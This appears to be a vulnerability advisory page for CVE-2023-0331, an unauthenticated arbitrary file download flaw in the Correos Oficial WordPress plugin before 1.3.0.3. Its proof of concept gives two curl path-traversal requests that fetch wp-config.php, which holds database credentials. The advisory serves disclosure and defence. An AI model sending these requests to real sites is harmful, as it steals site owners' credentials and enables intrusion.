Correos Oficial < 1.3.0.3 – Unauthenticated Arbitrary File Download | CVE 2023-0331 | Plugin Vulnerabilities

Description

The plugin does not have an authorization check user input validation when generating a file path, allowing unauthenticated attackers to download arbitrary files from the server.

Proof of Concept

Dependency: WooCommerce plugin

Use the following curl command to download the contents of the wp-config.php file:

curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=../../..&filename=wp-config.php' 

or

curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=..&filename=/../../wp-config.php'

Affects Plugins

Fixed in 1.3.0.3

References

CVE

Classification

Type

FILE DOWNLOAD

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Andrea Iodice

Submitter

Andrea Iodice

Verified

Yes

WPVDB ID

1b4dbaf3-1364-4103-9a7b-b5a1355c685b

Timeline

Publicly Published

2023-01-31 (about 2 years ago)

Added

2023-01-31 (about 2 years ago)

Last Updated

2025-05-23 (about 7 months ago)

Other

Published

Title

Published

2022-08-17

Title

All-in-One Video Gallery 2.5.8 - 2.6.0 - Unauthenticated Arbitrary File Download & SSRF

Published

2022-09-19

Title

Download Monitor < 4.5.98 - Admin+ Arbitrary File Download

Published

2025-07-23

Title

Security Ninja 5.201 - 5.242 - Admin+ Arbitrary File Read

Published

2023-09-25

Title

NextGEN Gallery < 3.39 - Admin+ Arbitrary File Read and Delete

Published

2025-11-10

Title

Auto Amazon Links – Amazon Associates Affiliate Plugin <= 5.4.3 - Unauthenticated Arbitrary File Read